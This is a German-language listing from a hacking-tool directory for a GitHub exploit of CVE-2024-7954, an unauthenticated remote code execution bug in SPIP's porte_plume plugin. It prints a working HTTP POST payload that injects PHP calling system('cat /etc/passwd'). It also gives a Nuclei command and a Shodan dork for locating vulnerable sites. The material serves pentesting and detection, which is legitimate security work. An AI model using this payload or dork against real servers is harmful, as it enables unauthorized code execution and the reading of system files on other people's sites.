Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/thecyberguy-17/rce_cve-2024-7954
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubthecyberguy-17/rce_cve-2024-7954

RCE_CVE-2024-7954

Exploit für CVE-2024-7954, eine nicht authentifizierte Remote-Codeausführung im porte_plume-Plugin von SPIP, mit einer Nuclei-Vorlage und Shodan-Dork zur Erkennung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
5vor 1 JahrNoch nicht geprüft

RCE_CVE-2024-7954

Beschreibung:

Das porte_plume-Plugin, das von SPIP vor 4.30-alpha2, 4.2.13 und 4.1.16 verwendet wird, ist anfällig für eine Schwachstelle zur Ausführung beliebigen Codes. Ein entfernter und nicht authentifizierter Angreifer kann beliebiges PHP als SPIP-Benutzer ausführen, indem er eine manipulierte HTTP-Anfrage sendet. (KRITISCH)

Exploit:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Verwendetes Tool:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Shodan Dork:

app="SPIP"

Referenz:

1) https://github.com/fa-rrel
Tool herunterladen